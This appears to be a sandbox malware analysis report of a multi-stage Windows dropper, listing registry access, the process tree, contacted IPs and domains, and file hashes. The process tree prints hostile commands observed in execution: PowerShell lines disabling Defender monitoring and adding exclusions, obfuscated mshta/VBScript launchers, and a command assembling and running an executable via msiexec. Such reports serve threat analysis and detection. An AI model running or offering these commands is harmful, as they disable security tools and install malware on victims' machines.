| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
"C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe
Tue19c28f648204dbd4.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe
Tue19b4b38a7569a9.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cd42a7c874e44.exe
Tue19cd42a7c874e44.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe
Tue19ac3c92c21.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe
Tue197e9ec0ff0.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe
Tue196397c0f84f8.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe
Tue19cef5687a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe
Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe
Tue1932df4dae.exe
C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp" /SL5="$80192,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe
Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe
Tue1968b7ee9058232e8.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe
Tue19c9e031f4.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe
Tue192c34b1c2f5.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe
Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe
Tue193129b31e741ef3.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe"
C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp" /SL5="$A019E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe" /SILENT
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 488
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue1932df4dae.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y .\bENCc.E
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | marianu.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| FR | 51.178.186.149:80 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| N/A | 127.0.0.1:49277 | tcp | |
| N/A | 127.0.0.1:49279 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | telegka.top | udp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 104.155.138.21:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 104.155.138.21:80 | telegka.top | tcp |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp |
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | d0fbd06f5709db11a8b2449a1b919251 |
| SHA1 | 83f4610e15b613668b9ebad734dbc2f8fbefc614 |
| SHA256 | e94188908546b2f00a506d7596d3673b814ab62173967b3d258422877bc56f84 |
| SHA512 | c82970a78fba054ec6e9a962a43ca6fb94ddd3a0d744dd5b9d04a014f541e6da8038497c2ba15403df12600372cb624caf6e672eeac6915f680b062efeae1e8b |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
| MD5 | c10ba859e90df8a8d8e7dcc8dfe5ac20 |
| SHA1 | 92d43cc9db4e8e70d0eaf7f3406bad818f4a27c5 |
| SHA256 | 6c77a4d421de0321d74ec8d3fca02e782ac035ef471b1218471f139557e3a023 |
| SHA512 | 00fd1f5656cac70d0c769c8752d52a46f5ef3f93a10ee87f5e8ee63edd20e2d9c22cbf4f6123a835c701b432527821731e6bbc0b42b0fa5e41a52ca232d28d2a |
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2752-72-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2752-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2752-89-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2752-88-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2752-86-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2752-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe
| MD5 | 26278caf1df5ef5ea045185380a1d7c9 |
| SHA1 | df16e31d1dd45dc4440ec7052de2fc026071286c |
| SHA256 | d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5 |
| SHA512 | 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03 |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
memory/2352-183-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1964-182-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2160-181-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1528-193-0x0000000000390000-0x0000000000400000-memory.dmp
memory/1320-192-0x0000000000020000-0x0000000000092000-memory.dmp
memory/2436-191-0x0000000000F00000-0x0000000000F70000-memory.dmp
memory/2964-149-0x0000000001200000-0x0000000001208000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7QURGKV1BLVSU6TPY56V.temp
| MD5 | d54a06bc432f97ef572d5736b224ccd4 |
| SHA1 | 498ba77b33bad2fa6148080e4b0fb334381348d1 |
| SHA256 | 2093a640c33ad1575985fafafeabae46c1da8b905aa341d125da8f70069b7d5a |
| SHA512 | bc883edc62b2daec082dfd58d72fc2cc3b3b45e92343d2c8f721f0dc69aa991640a55bad96c7eb810268469f93cf07bda02cc94333a9088ad0f48fc084dfd679 |
memory/2796-196-0x00000000002C0000-0x00000000002D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-O3K3C.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
